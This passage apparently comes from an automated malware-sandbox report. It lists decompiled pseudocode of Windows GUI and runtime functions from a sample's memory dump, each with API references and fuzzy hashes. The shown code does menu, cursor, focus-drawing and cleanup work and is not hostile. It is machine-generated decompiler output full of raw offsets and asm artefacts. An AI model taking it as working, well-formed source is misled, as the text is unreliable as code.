                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CurrentCursorMessageThreadWait
                                                                                • String ID: 0pH$8TE
                                                                                • API String ID: 535285469-2347222379
                                                                                • Opcode ID: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction ID: ef179845760a388f2d3b94f2e4396c7f7e61d99bb3ed3a3471b4b2a0e5122e17
                                                                                • Opcode Fuzzy Hash: 33e272798ce47cd420cc52f89068bdd1ce196a76f822225d5e692daa21e4ed6f
                                                                                • Instruction Fuzzy Hash: FE31A430A04648EFDB01DB95D855BAEB7F5EB45305F6184BAEC00A7392D7786E0CCB18
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00448B18(intOrPtr* __eax) {
                                                                                				struct tagMENUITEMINFOA _v128;
                                                                                				intOrPtr _v132;
                                                                                				int _t16;
                                                                                				intOrPtr* _t29;
                                                                                				struct HMENU__* _t36;
                                                                                				MENUITEMINFOA* _t37;
                                                                                
                                                                                				_t37 =  &_v128;
                                                                                				_t29 = __eax;
                                                                                				_t16 =  *0x486dd0; // 0x4877f0
                                                                                				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                                                					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                                                					_t37->cbSize = 0x2c;
                                                                                					_v132 = 0x10;
                                                                                					_v128.hbmpUnchecked =  &(_v128.cch);
                                                                                					_v128.dwItemData = 0x50;
                                                                                					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                					if(_t16 != 0) {
                                                                                						_t16 = E00448E9C(_t29);
                                                                                						asm("sbb edx, edx");
                                                                                						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                                                							_v128.cbSize = ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) + ((E00448E9C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                                                							_v132 = 0x10;
                                                                                							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                                							if(_t16 != 0) {
                                                                                								return DrawMenuBar( *(_t29 + 0x38));
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t16;
                                                                                			}










                                                                                APIs
                                                                                • GetMenuItemInfoA.USER32 ref: 00448B66
                                                                                • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448BB8
                                                                                • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448BC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$InfoItem$Draw
                                                                                • String ID: P
                                                                                • API String ID: 3227129158-3110715001
                                                                                • Opcode ID: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction ID: 8907f95ecabcbea213e89b25aadd05f800e1c1858eab99648a633ad0099d5281
                                                                                • Opcode Fuzzy Hash: eaf55a4eab559924dae5380356c89efe65fe6fcff4096a5dc4b7a8903ee41b04
                                                                                • Instruction Fuzzy Hash: EA118FB0605210AFE3109B29CC81B5E76D5EB84358F148A2EF0A4DB3D5DBB9D885C78A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 76%
                                                                                			E00425BB8(void* __ebx, void* __ecx, void* __edx) {
                                                                                				intOrPtr _t3;
                                                                                				intOrPtr _t5;
                                                                                				intOrPtr _t7;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t16;
                                                                                				intOrPtr _t18;
                                                                                				void* _t20;
                                                                                				void* _t27;
                                                                                				intOrPtr _t33;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr _t38;
                                                                                
                                                                                				_t27 = __ecx;
                                                                                				_push(_t38);
                                                                                				_push(0x425c81);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t38;
                                                                                				 *0x487a2c =  *0x487a2c + 1;
                                                                                				if( *0x487a2c == 0) {
                                                                                					_t3 =  *0x487a84; // 0x22e0b50
                                                                                					E004035B4(_t3);
                                                                                					_t5 =  *0x46b784; // 0x0
                                                                                					E004035B4(_t5);
                                                                                					_t7 =  *0x46b780; // 0x0
                                                                                					E004035B4(_t7);
                                                                                					E00422B9C(__ebx, _t27);
                                                                                					_t10 =  *0x46b788; // 0x22e0b74
                                                                                					E004035B4(_t10);
                                                                                					_t12 =  *0x487a80; // 0x22e0bb0
                                                                                					E004035B4(_t12);
                                                                                					_t14 =  *0x487a74; // 0x22e0ad8
                                                                                					E004035B4(_t14);
                                                                                					_t16 =  *0x487a78; // 0x22e0b00
                                                                                					E004035B4(_t16);
                                                                                					_t18 =  *0x487a7c; // 0x22e0b28
                                                                                					E004035B4(_t18);
                                                                                					_t20 =  *0x487a28; // 0xf50806b6
                                                                                					DeleteObject(_t20);
                                                                                					_push(0x487a44);
                                                                                					L00406838();
                                                                                					_push(0x487a5c);
                                                                                					L00406838();
                                                                                					_t34 =  *0x412938; // 0x41293c
                                                                                					E00404E00(0x46b6a0, 0x12, _t34);
                                                                                					_t35 =  *0x412938; // 0x41293c
                                                                                					E00404E00(0x46b518, 0x31, _t35);
                                                                                				}
                                                                                				_pop(_t33);
                                                                                				 *[fs:eax] = _t33;
                                                                                				_push(0x425c88);
                                                                                				return 0;
                                                                                			}


















                                                                                APIs
                                                                                • DeleteObject.GDI32(F50806B6), ref: 00425C30
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A44,F50806B6,00000000,00425C81), ref: 00425C3A
                                                                                • RtlDeleteCriticalSection.KERNEL32(00487A5C,00487A44,F50806B6,00000000,00425C81), ref: 00425C44
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Delete$CriticalSection$Object
                                                                                • String ID: <)A
                                                                                • API String ID: 378701848-2544708363
                                                                                • Opcode ID: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction ID: 22795a93df35987cad2729373931b2b91126da6fc89bb47129e9437559cd03b6
                                                                                • Opcode Fuzzy Hash: ee513705faa84d92f2094eeb87fc4e5f7c42333d3502ee9816f9952387714f7f
                                                                                • Instruction Fuzzy Hash: 08013CB03141009BC715FF26ED5290D7768E744705360487BF000A7BB2DA7CDE518B8D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040B34C() {
                                                                                				_Unknown_base(*)()* _t1;
                                                                                				struct HINSTANCE__* _t3;
                                                                                
                                                                                				_t1 = GetModuleHandleA("kernel32.dll");
                                                                                				_t3 = _t1;
                                                                                				if(_t3 != 0) {
                                                                                					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                                					 *0x46b0e4 = _t1;
                                                                                				}
                                                                                				if( *0x46b0e4 == 0) {
                                                                                					 *0x46b0e4 = E00408ACC;
                                                                                					return E00408ACC;
                                                                                				}
                                                                                				return _t1;
                                                                                			}






                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C025,00000000,0040C038), ref: 0040B352
                                                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B363
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction ID: a513fbbfe291899ee6294738837c62684835be1d612828af4dfd11c86fef4dc6
                                                                                • Opcode Fuzzy Hash: 7a2e7a6ad3db9ec5b6a148488899aea6f251dff6c7e78eecb5d69a20a1fe6600
                                                                                • Instruction Fuzzy Hash: 6BD05EA17023026ED300ABA05D8160F2544D300304B21803BE902B52D2E7BC885146CE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E00463678(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
                                                                                				char _v8;
                                                                                				intOrPtr _v12;
                                                                                				struct tagRECT _v28;
                                                                                				intOrPtr _v32;
                                                                                				struct HWND__* _v36;
                                                                                				signed short _v38;
                                                                                				char _v39;
                                                                                				char _v40;
                                                                                				signed int _v52;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				void* _t93;
                                                                                				struct HWND__* _t94;
                                                                                				signed int _t99;
                                                                                				signed int _t100;
                                                                                				signed int _t123;
                                                                                				struct HWND__* _t125;
                                                                                				signed int _t127;
                                                                                				signed int _t129;
                                                                                				void* _t131;
                                                                                				struct HWND__* _t144;
                                                                                				struct HWND__* _t145;
                                                                                				intOrPtr _t148;
                                                                                				void* _t152;
                                                                                				struct HWND__* _t153;
                                                                                				intOrPtr _t155;
                                                                                				intOrPtr _t159;
                                                                                				struct HWND__* _t196;
                                                                                				struct HWND__* _t200;
                                                                                				long _t209;
                                                                                				struct HWND__** _t212;
                                                                                				void* _t213;
                                                                                
                                                                                				_t180 = __ecx;
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				_v32 = __ecx;
                                                                                				_v8 = __eax;
                                                                                				_t212 =  &_v8;
                                                                                				_t93 = E00460E0C( *((intOrPtr*)( *_t212 + 0x29c)));
                                                                                				_t214 =  *((intOrPtr*)(_t93 + 8));
                                                                                				if( *((intOrPtr*)(_t93 + 8)) == 0) {
                                                                                					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
                                                                                					return E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                                				}
                                                                                				_t94 =  *_t212;
                                                                                				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
                                                                                				if( *((char*)(_t94 + 0x2e8)) != 1) {
                                                                                					L10:
                                                                                					_t209 = _v28.left;
                                                                                					_v36 = E004631E0( *_t212, _v32);
                                                                                					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
                                                                                					__eflags = _t99;
                                                                                					_t100 = _t99 >> 1;
                                                                                					if(__eflags < 0) {
                                                                                						asm("adc eax, 0x0");
                                                                                					}
                                                                                					_v52 = _t100;
                                                                                					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
                                                                                					E0041FCC0( *((intOrPtr*)( *_t212 + 0x208)));
                                                                                					E0041F338( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
                                                                                					E0041F9D0( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
                                                                                					_v12 = E0041FC00(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
                                                                                					__eflags =  *( *_t212 + 0x22c) - _v32;
                                                                                					if(__eflags == 0) {
                                                                                						E0041F338( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
                                                                                						E0041EB4C( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
                                                                                					}
                                                                                					_v40 =  *((intOrPtr*)(_v36 + 0x18));
                                                                                					_v39 = E004617E4(_v36);
                                                                                					_v38 = E00460EF8(_v36);
                                                                                					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
                                                                                					__eflags = _t123 - 5;
                                                                                					if(__eflags > 0) {
                                                                                						L22:
                                                                                						_t125 =  *( *_t212 + 0x22c);
                                                                                						__eflags = _t125 - _v32;
                                                                                						if(_t125 != _v32) {
                                                                                							goto L35;
                                                                                						}
                                                                                						_t125 = _v36;
                                                                                						__eflags =  *(_t125 + 8);
                                                                                						if( *(_t125 + 8) == 0) {
                                                                                							goto L35;
                                                                                						}
                                                                                						_t127 =  *( *_t212 + 0x234);
                                                                                						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
                                                                                						_t196 =  *_t212;
                                                                                						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
                                                                                						if( *((char*)(_t196 + 0x2e0)) >= 4) {
                                                                                							_v28.left = _v28.left - _v52;
                                                                                							_t200 =  *_t212;
                                                                                							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
                                                                                							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
                                                                                								_t76 =  &_v28;
                                                                                								 *_t76 = _v28.left + _t127;
                                                                                								__eflags =  *_t76;
                                                                                							}
                                                                                						}
                                                                                						_t129 =  *( *_t212 + 0x2e0);
                                                                                						__eflags = _t129;
                                                                                						if(_t129 != 0) {
                                                                                							__eflags = _t129 - 4;
                                                                                							if(_t129 != 4) {
                                                                                								_t80 =  &_v28;
                                                                                								 *_t80 = _v28.left +  *( *_t212 + 0x234);
                                                                                								__eflags =  *_t80;
                                                                                							}
                                                                                						}
                                                                                						__eflags = _t129 - 3;
                                                                                						if(_t129 == 3) {
                                                                                							_t83 =  &_v28;
                                                                                							 *_t83 = _v28.left +  *( *_t212 + 0x234);
                                                                                							__eflags =  *_t83;
                                                                                						}
                                                                                						_t131 = E0043BD14( *_t212);
                                                                                						_t125 = GetFocus();
                                                                                						__eflags = _t131 - _t125;
                                                                                						if(_t131 != _t125) {
                                                                                							goto L35;
                                                                                						} else {
                                                                                							_t125 =  *_t212;
                                                                                							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                                							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                                								goto L35;
                                                                                							}
                                                                                							return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                                						}
                                                                                					} else {
                                                                                						switch( *((intOrPtr*)(_t123 * 4 +  &M00463858))) {
                                                                                							case 0:
                                                                                								E00463250(_t213);
                                                                                								goto L22;
                                                                                							case 1:
                                                                                								__eax = E0046345C(__edi, __esi, __ebp);
                                                                                								goto L22;
                                                                                							case 2:
                                                                                								__eax = E004633AC(__edi, __ebp);
                                                                                								goto L22;
                                                                                							case 3:
                                                                                								__eax = E004632A0(__edi, __esi, __ebp);
                                                                                								goto L22;
                                                                                							case 4:
                                                                                								__eax = E0046350C(__edi, __esi, __eflags, __ebp);
                                                                                								goto L22;
                                                                                							case 5:
                                                                                								__eax = E00463594(__edi, __eflags, __ebp);
                                                                                								goto L22;
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t144 =  *_t212;
                                                                                					__eflags =  *((short*)(_t144 + 0x2f2));
                                                                                					if( *((short*)(_t144 + 0x2f2)) == 0) {
                                                                                						goto L10;
                                                                                					}
                                                                                					_t145 =  *_t212;
                                                                                					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
                                                                                					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
                                                                                						_t148 =  *0x463968; // 0x0
                                                                                						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
                                                                                					}
                                                                                					_t152 = E0043BD14( *_t212);
                                                                                					_t153 = GetFocus();
                                                                                					__eflags = _t152 - _t153;
                                                                                					if(_t152 != _t153) {
                                                                                						_t155 =  *0x463964; // 0x1
                                                                                						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
                                                                                					}
                                                                                					_t159 =  *0x463960; // 0x11
                                                                                					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
                                                                                					_t125 =  *_t212;
                                                                                					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
                                                                                					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
                                                                                						L35:
                                                                                						return _t125;
                                                                                					}
                                                                                					return DrawFocusRect(E0041FDC4( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
                                                                                				}
                                                                                			}




































                                                                                APIs
                                                                                • GetFocus.USER32 ref: 00463700
                                                                                • DrawFocusRect.USER32 ref: 00463748
                                                                                  • Part of subcall function 0041F9D0: FillRect.USER32 ref: 0041F9F8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FocusRect$DrawFill
                                                                                • String ID:
                                                                                • API String ID: 3476037706-0
                                                                                • Opcode ID: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction ID: 8f207b3e41a278f91515001cd5490541224029e2ee33265223180d2149407fd5
                                                                                • Opcode Fuzzy Hash: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction Fuzzy Hash: 79917E74A001458FCB10EF58C4C5AAEB7F5BF08315F2444BAE9849B316E778AD86CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004335B0(intOrPtr* __eax, signed int __edx) {
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr _t53;
                                                                                				intOrPtr _t54;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr* _t60;
                                                                                				intOrPtr* _t62;
                                                                                				struct HICON__* _t65;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr* _t72;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr* _t75;
                                                                                				intOrPtr _t78;
                                                                                				intOrPtr _t80;
                                                                                				intOrPtr _t82;
                                                                                				intOrPtr _t84;
                                                                                				intOrPtr _t85;
                                                                                				struct HWND__* _t88;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr _t91;
                                                                                				intOrPtr* _t93;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t100;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t104;
                                                                                				intOrPtr _t106;
                                                                                				struct HWND__* _t107;
                                                                                				intOrPtr _t108;
                                                                                				intOrPtr _t110;
                                                                                				intOrPtr _t114;
                                                                                				intOrPtr _t117;
                                                                                				char _t118;
                                                                                				intOrPtr _t119;
                                                                                				void* _t131;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t140;
                                                                                				intOrPtr* _t155;
                                                                                				void* _t158;
                                                                                				void* _t165;
                                                                                				void* _t166;
                                                                                
                                                                                				_t155 = __eax;
                                                                                				if( *0x487ba0 != 0) {
                                                                                					L3:
                                                                                					_t49 =  *0x487b80; // 0x0
                                                                                					_t50 =  *0x487b80; // 0x0
                                                                                					_t117 = E00433490(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                                                					if( *0x487ba0 == 0) {
                                                                                						_t168 =  *0x487ba4;
                                                                                						if( *0x487ba4 != 0) {
                                                                                							_t106 =  *0x487b94; // 0x0
                                                                                							_t107 = GetDesktopWindow();
                                                                                							_t108 =  *0x487ba4; // 0x0
                                                                                							E0043D6C4(_t108, _t107, _t168, _t106);
                                                                                						}
                                                                                					}
                                                                                					_t53 =  *0x487b80; // 0x0
                                                                                					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                                                						__eflags =  *0x487ba0;
                                                                                						_t6 =  &_v24;
                                                                                						 *_t6 =  *0x487ba0 != 0;
                                                                                						__eflags =  *_t6;
                                                                                						 *0x487ba0 = 2;
                                                                                					} else {
                                                                                						 *0x487ba0 = 1;
                                                                                						_v24 = 0;
                                                                                					}
                                                                                					_t54 =  *0x487b84; // 0x0
                                                                                					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                                                						L12:
                                                                                						_t55 =  *0x487b84; // 0x0
                                                                                						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                                                						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                						_t56 =  *0x487b84; // 0x0
                                                                                						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                                                							_t97 =  *0x487b84; // 0x0
                                                                                							E004351E4( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                                                							_t100 =  *0x487b84; // 0x0
                                                                                							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                                                							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                                                						}
                                                                                						_t131 = E004334E0(2);
                                                                                						_t121 =  *_t155;
                                                                                						_t60 =  *0x487b84; // 0x0
                                                                                						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                                                						if( *0x487ba4 != 0) {
                                                                                							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                                                								_t82 =  *0x487ba4; // 0x0
                                                                                								E0043D680(_t82, _t158);
                                                                                								_t84 =  *0x487ba4; // 0x0
                                                                                								_t177 =  *((char*)(_t84 + 0x6a));
                                                                                								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                                                									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                                                									_t85 =  *0x487ba4; // 0x0
                                                                                									E0043D7AC(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                                                								} else {
                                                                                									_t88 = GetDesktopWindow();
                                                                                									_t121 =  *_t155;
                                                                                									_t89 =  *0x487ba4; // 0x0
                                                                                									E0043D6C4(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                                                								}
                                                                                							} else {
                                                                                								_t91 =  *0x487ba4; // 0x0
                                                                                								E0043D820(_t91, _t131, __eflags);
                                                                                								_t93 =  *0x486dac; // 0x487c00
                                                                                								SetCursor(E004536BC( *_t93, _t158));
                                                                                							}
                                                                                						}
                                                                                						_t62 =  *0x486dac; // 0x487c00
                                                                                						_t65 = SetCursor(E004536BC( *_t62, _t158));
                                                                                						if( *0x487ba0 != 2) {
                                                                                							L32:
                                                                                							return _t65;
                                                                                						} else {
                                                                                							_t179 = _t117;
                                                                                							if(_t117 != 0) {
                                                                                								_t118 = E0043351C(_t121);
                                                                                								_t67 =  *0x487b84; // 0x0
                                                                                								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                                                								__eflags = _t118;
                                                                                								if(__eflags != 0) {
                                                                                									E004351E4(_t118,  &_v24, _t155);
                                                                                									_t65 = E004037B0(_t118, __eflags);
                                                                                									_t135 =  *0x487b84; // 0x0
                                                                                									 *(_t135 + 0x54) = _t65;
                                                                                								} else {
                                                                                									_t78 =  *0x487b84; // 0x0
                                                                                									_t65 = E004037B0( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                                                									_t140 =  *0x487b84; // 0x0
                                                                                									 *(_t140 + 0x54) = _t65;
                                                                                								}
                                                                                							} else {
                                                                                								_push( *((intOrPtr*)(_t155 + 4)));
                                                                                								_t80 =  *0x487b84; // 0x0
                                                                                								_t65 = E004037B0( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                                                							}
                                                                                							if( *0x487b84 == 0) {
                                                                                								goto L32;
                                                                                							} else {
                                                                                								_t119 =  *0x487b84; // 0x0
                                                                                								_t41 = _t119 + 0x5c; // 0x5c
                                                                                								_t42 = _t119 + 0x44; // 0x44
                                                                                								_t65 = E0040845C(_t42, 0x10, _t41);
                                                                                								if(_t65 != 0) {
                                                                                									goto L32;
                                                                                								}
                                                                                								if(_v28 != 0) {
                                                                                									_t75 =  *0x487b84; // 0x0
                                                                                									 *((intOrPtr*)( *_t75 + 0x34))();
                                                                                								}
                                                                                								_t72 =  *0x487b84; // 0x0
                                                                                								 *((intOrPtr*)( *_t72 + 0x30))();
                                                                                								_t74 =  *0x487b84; // 0x0
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								return _t74;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t65 = E004334E0(1);
                                                                                					if( *0x487b84 == 0) {
                                                                                						goto L32;
                                                                                					}
                                                                                					_t102 =  *0x487b84; // 0x0
                                                                                					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                                                					_t103 =  *0x487b84; // 0x0
                                                                                					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                                                					_t104 =  *0x487b84; // 0x0
                                                                                					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                                                					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                					_t65 = E004334E0(0);
                                                                                					if( *0x487b84 == 0) {
                                                                                						goto L32;
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                				_t110 =  *0x487b90; // 0x0
                                                                                				asm("cdq");
                                                                                				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x487b9c; // 0x0
                                                                                				if(_t165 >= 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				_t114 =  *0x487b94; // 0x0
                                                                                				asm("cdq");
                                                                                				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                                                				_t166 = _t65 -  *0x487b9c; // 0x0
                                                                                				if(_t166 < 0) {
                                                                                					goto L32;
                                                                                				}
                                                                                				goto L3;
                                                                                			}


















































                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00433624
                                                                                • GetDesktopWindow.USER32 ref: 00433749
                                                                                • SetCursor.USER32(00000000), ref: 0043379E
                                                                                  • Part of subcall function 0043D820: 73451770.COMCTL32(00000000,?,00433779), ref: 0043D83C
                                                                                  • Part of subcall function 0043D820: ShowCursor.USER32(000000FF,00000000,?,00433779), ref: 0043D857
                                                                                • SetCursor.USER32(00000000), ref: 00433789
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Cursor$DesktopWindow$73451770Show
